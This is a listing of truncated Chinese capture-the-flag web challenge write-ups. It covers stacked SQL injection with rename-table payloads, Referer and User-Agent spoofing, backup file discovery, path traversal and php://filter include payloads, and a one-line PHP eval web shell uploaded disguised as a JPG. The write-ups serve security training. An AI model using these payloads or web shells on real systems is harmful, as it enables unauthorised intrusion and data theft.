[强网杯 2019]随便注11解通过 rename 先把 words 表改名为其他的表名。把 1919810931114514 表的名字改为 words 。给新 words 表添加新的列名 id 。将 flag 改名为 data 。Payload：1'; rename table words to word1; rename table `1919810931114514` to words...

[极客大挑战 2019]Http1题解：1． 查看源代码，发现文件Secret.php2． 查看后发现提示“It doesn't come from 'https://Sycsecret.buuoj.cn'”，记录跳转位置的请求头是refer，更改refer为'https://Sycsecret.buuoj.cn'3． 提示“Please use "Syclover" browser”，us...

[ACTF2020 新生赛]BackupFile1.题目名字为backupfile（备份文件）​ 常见备份文件名后缀：.git .svn .swp .~ .bak .bash_history2.使用dirsearch扫描网站后台目录3.输入index.php.bak得到代码<?php include_once "flag.php"; if(isset($_G...

WarmUp 1include函数的特性以字符‘/’分隔（而且不计个数），若是在前面的字符串所代表的文件无法被PHP找到，则PHP会自动包含‘/’后面的文件——注意是最后一个‘/’构造payload?file=hint.php?/../../../../ffffllllaaaagggg[ACTF2020 新生赛]Include1构造payload?file=php://filter/read...

[极客大挑战 2019]Knife1题解：发现网页显示“我家菜刀丢了，你能帮我找一下么 eval($_POST["Syc"]);”所以使用中国菜刀或蚁剑连接网站后台在“/”目录下找到flag文件[极客大挑战 2019]Upload1题解：​ 1.发现是上传jpg文件​ 2.编写一句话木马<?php @eval($_POST[value]);?>保存为jpg文件上传，由...